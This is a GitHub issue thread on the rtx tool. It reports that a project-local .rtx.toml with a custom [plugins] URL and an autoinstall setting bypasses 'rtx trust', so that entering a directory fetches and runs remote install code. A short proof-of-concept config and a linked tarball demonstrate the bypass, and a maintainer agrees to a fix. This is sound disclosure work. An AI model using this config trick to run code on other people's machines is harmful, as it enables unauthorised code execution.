### ISSUE TITLE
[plugins] and [settings] in .rtx.toml should only be applied in trusted config files

### ISSUE THREAD

**Issue by Riatre** [jdxcode/rtx#728]
**Describe the bug**
It is possible to have `[plugins]` and `[settings]` section in project-local `.rtx.toml`. Combine custom plugins and `missing_runtime_behavior = "autoinstall"` we may defeat the idea of `rtx trust` completely. The following `.rtx.toml` demonstrates the issue:

```
[tools]
bruh = ["bruh"]

[plugins]
bruh = 'https://github.com/Riatre/not-a-real-asdf-plugin.git'

[settings]
missing_runtime_behavior = "autoinstall"
```

Upon entering a directory with such a `.rtx.toml` you should see that it clones `Riatre/not-a-real-asdf-plugin` and runs install, which, in turn, runs `id > /tmp/lmao`.

**To Reproduce**
Alternatively you can archive the config file to a tar and get `tar xvf huh.tar` to arbitrary code execution, due to rtx's presence in precmd, for example: 
[huh.tar.gz](https://github.com/jdxcode/rtx/files/12186649/huh.tar.gz)

**Expected behavior**
rtx should not run arbitrary code downloaded from the Internet automatically when I cd into a directory or un-tar a tarball.

**`rtx doctor` output**

N/A

**Additional context**
This may sound like a security issue but I don't think it's serious enough to warrant a security vulnerability report. Other public projects also had similar behavior, for example, git happily executes whatever command in `core.fsmonitor` in `.git/config` when you `git status` (and popular shell prompt "themes" run `git status` all the times). This was publicly acknowledged and wasn't considered a security issue. However given that there's `rtx trust` I believe this is at least a bug.

IMO parsing `[settings]` section in project-local config files is in general troublesome, for example there's also `trusted_config_paths`, I didn't bother to see if it's possible to whitelist ourselves, though.

**Comment by jdxcode** [comment]
agreed, `[plugins]` sections should require trusted configs

**Comment by jdxcode** [comment]
btw `trusted_config_paths` should only be usable by the global config file. It shouldn't be possible for it to whitelist itself either.
